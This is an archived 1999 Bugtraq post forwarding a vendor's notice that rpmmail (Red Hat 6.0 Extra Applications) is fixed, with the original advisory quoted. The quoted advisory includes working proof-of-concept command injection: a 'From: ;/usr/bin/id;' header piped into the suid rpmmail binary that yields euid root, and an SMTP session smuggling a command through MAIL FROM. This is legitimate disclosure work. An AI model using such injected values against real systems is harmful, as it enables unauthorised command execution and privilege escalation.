Bugtraq mailing list archives
Fwd: [Re: RH6.0 local/remote command execution]
From: btellier () USA NET (Brock Tellier)
Date: Wed, 6 Oct 1999 10:04:42 MDT
____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1 <STRONG>attached mail follows:</STRONG><HR> Thanks for pointing out the vulnerability problem with our rpmmail package. We have fixed this problem and posted new versions on our FTP site. (below) If you get a chance please put this version thru your testing process. We are grateful to people like you who help us in our on going effort to produce quality, bug free software. ftp://reedycreek.com/reedycreek/rpmmaildemo/rpmmail-1.4.tar.gz or ftp://reedycreek.com/reedycreek/rpmmaildemo/rpmmail-1.4-2.i386.rpm At 04:19 PM 10/5/99 -0400, you wrote:
Greetings, A vulnerability exists in the rpmmail package distributed on the Red Hat 6.0 Extra Applications CD. The potential compromise for this bug could be remote or local root or simply remote command execution as "nobody" or similar, depending on your system configuration. By sending a carefully crafted mail message to >By sending a carefully crafted mail message to rpmmail@vulnerablehost, you
can
get /home/rpmmail/rpmmail (suid root by default, exec'd by .forward
remotely)
to system(3) any command you wish. The command executed does not
necessarily
have root privs because of bash's handling of euid != uid of caller.
Although
system(3) calls /bin/sh -c, it is linked by default (can anyone verify these?) on some Linux systems, such as SuSE 6.2, to /bin/bash v2. From the system(3) man page: system() will not, in fact, work properly from programs with suid or sgid privileges on systems on which /bin/sh is bash version 2, since bash 2 drops privileges on startup. (Debian uses a modified bash which does not do this when invoked as sh.) Thus some systems with rpmmail installed are vulnerable to local/remote
root,
all others to remote command execution as an unpriv'd user. The local exploit as follows: /bin/sh is linked to /bin/bash (default SuSE 6.2 behavior: bash-2.03$ ls -la /bin/sh lrwxrwxrwx 1 root root 9 Oct 5 11:27 /bin/sh -> /bin/bash bash-2.03$ cat /etc/SuSE-release;uname -a;id SuSE Linux 6.2 (i386) VERSION = 6.2 Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown uid=100(xnec) gid=100(users) groups=100(users) bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah Could not open config file! sh: Y: command not found uid=100(xnec) gid=100(users) groups=100(users) Could not open acknowledge file! bash-2.03$ ---- After linking /bin/sh to /bin/ksh instead: bash-2.03$ ls -la /bin/sh lrwxrwxrwx 1 root root 8 Oct 5 11:09 /bin/sh -> /bin/ksh bash-2.03$ cat /etc/SuSE-release;uname -a;id SuSE Linux 6.2 (i386) VERSION = 6.2 Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown uid=100(xnec) gid=100(users) groups=100(users) bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah Could not open config file! sh: Y: not found uid=100(xnec) gid=100(users) euid=0(root) egid=0(root) groups=100(users) Could not open acknowledge file! bash-2.03$ The remote exploit is merely: bash-2.03$ telnet localhost 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500 (CDT) MAIL FROM: ;/command/to/execute; 250 <;/command/to/execute;> ... Sender Okay RCPT TO: rpmmail 250 <rpmmail> ... Recipient Okay data 354 Enter mail, end with "." on a line by itself
Brian Gold Reedy Creek Technologies, Inc. Voice: (919) 934-6869 Ext. 124 Fax: (919) 934-1537 bgold () reedycreek com http://www.reedycreek.com/
Current thread:
- Fwd: [Re: RH6.0 local/remote command execution] Brock Tellier (Oct 06)